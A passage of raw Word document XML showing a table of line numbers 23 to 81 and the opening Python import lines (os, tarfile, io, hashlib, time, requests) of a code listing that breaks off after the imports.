            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F59BC7" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="406604A6" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24CD289A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9B5CAE" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3F7D03" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AABDB65" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0C7C8C" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6012CBF1" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C26C886" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E78CB5" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0DAEED" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33FCBCA0" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01DD09CA" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CD3EAF" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37EA912D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD02E69" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19913B6D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A190CC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183CD7E6" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71335AB5" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A2BCEE2" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DAC9B20" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C81176" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>46</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3352B8DB" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="078A6CFF" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D06FFE" w14:textId="6C651A58" w:rsidR="006546FE" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DBB36E4" w14:textId="77777777" w:rsidR="006546FE" w:rsidRPr="006208D4" w:rsidRDefault="006546FE" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F7458A7" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D79CFF6" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752C13A3" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36FA5D69" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDE4F19" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>54</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148D56A4" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D417BEB" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="243B8B8A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B64E435" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08938C24" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F73EE1D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D828861" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B6D3C5" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E700F0" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641BBEE4" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17772A84" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A6BCD4" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A6F7AC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14782F1E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61B45D20" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F657C8D" w14:textId="77777777" w:rsidR="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B4AB4D" w14:textId="77777777" w:rsidR="003348E0" w:rsidRPr="006208D4" w:rsidRDefault="003348E0" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53680497" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5884E6C0" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D95420A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62138838" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225DBFA9" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018E7EC8" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>76</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A25D9A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EDB776" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA3F8FD" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0093FAEC" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480DF0B2" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>81</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59D7C903" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>import os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4647500E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import tarfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38D70C5E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D023F7A" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import hashlib</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A49F02E" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118FEBC8" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import requests</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59550DAE" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EFAA4A1" w14:textId="77777777" w:rsidR="006208D4" w:rsidRPr="006208D4" w:rsidRDefault="006208D4" w:rsidP="006208D4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006208D4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
